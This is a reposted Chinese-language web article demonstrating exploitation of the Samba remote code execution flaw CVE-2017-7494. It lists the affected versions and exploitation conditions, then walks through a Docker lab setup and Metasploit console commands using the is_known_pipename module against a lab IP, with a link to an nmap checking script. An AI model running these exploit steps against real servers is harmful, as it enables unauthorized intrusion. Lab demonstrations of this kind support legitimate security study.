服務(wù)器版“永恒之藍(lán)”高危預(yù)警 (Samba遠(yuǎn)程命令執(zhí)行漏洞CVE-2017-7494) 攻擊演示
發(fā)表時(shí)間:2023-04-04 來源:明輝站整理相關(guān)軟件相關(guān)文章人氣:
[摘要]漏洞信息:2017年5月24日Samba發(fā)布了4.6.4版本, 中間修復(fù)了一個(gè)嚴(yán)重的遠(yuǎn)程代碼執(zhí)行漏洞, 漏洞編號(hào)CVE-2017-7494, 漏洞影響了Samba 3.5.0 之后到4.6.4/4....
漏洞信息:
2017年5月24日Samba發(fā)布了4.6.4版本, 中間修復(fù)了一個(gè)嚴(yán)重的遠(yuǎn)程代碼執(zhí)行漏洞, 漏洞編號(hào)CVE-2017-7494, 漏洞影響了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中間的所有版本。
漏洞利用條件:
1. 服務(wù)器打開了文件/打印機(jī)共享端口445, 讓其能夠在公網(wǎng)上訪問
2. 共享文件擁有寫入權(quán)限
3. 惡意攻擊者需猜解Samba服務(wù)端共享目錄的物理路徑
滿足以上條件時(shí), 由于Samba能夠?yàn)檫x定的目錄創(chuàng)建網(wǎng)絡(luò)共享, 當(dāng)惡意的客戶端連接上一個(gè)可寫的共享目錄時(shí), 通過上傳惡意的鏈接庫文件, 使服務(wù)端程序加載并執(zhí)行它, 從而實(shí)現(xiàn)遠(yuǎn)程代碼執(zhí)行。 根據(jù)服務(wù)器的情況, 攻擊者還有可能以root身份執(zhí)
測(cè)試環(huán)境:
在docker下搭建測(cè)試環(huán)境
1.拉取鏡像到本地
root@backlion-virtual-machine:/home/backlion# docker pull medicean/vulapps:s_samba_1
2.啟動(dòng)環(huán)境, 并將虛擬的445端口映射到物理機(jī)的445端口上:
root@backlion-virtual-machine:/home/backlion# docker run -d -p 445:445 -p 139:139 -p 138:138 -p 137:137 medicean/vulapps:s_samba_1
3.在msf下的利用(kali主機(jī)IP: 10.0.0.140, 靶機(jī)下的ubuntu的物理住機(jī)IP:10.0.0.158)
利用的poc:
https://github.com/hdm/metasploit-framework/blob/0520d7cf76f8e5e654cb60f157772200c1b9e230/modules/exploits/linux/samba/is_known_pipename.rb
將is_known_pipename.rb
拷貝到/usr/share/metasploit-framework/modules/exploits/linux/samba/
root@backlion:~# service postgresql startroot@backlion:~# msfconsolemsf > search is_known_pipenamemsf > use exploit/linux/samba/is_known_pipenamemsf exploit(is_known_pipename) > show optionsmsf exploit(is_known_pipename) > set rhost 10.0.0.158msf exploit(is_known_pipename) > set rport 445msf exploit(is_known_pipename) > exploit
漏洞檢查的NAMP腳本:
http://ys-k.ys168.com/576161633/UIwHtkm3L3K3I865MJ6/samb.nse
上面是電腦上網(wǎng)安全的一些基礎(chǔ)常識(shí),學(xué)習(xí)了安全知識(shí),幾乎可以讓你免費(fèi)電腦中毒的煩擾。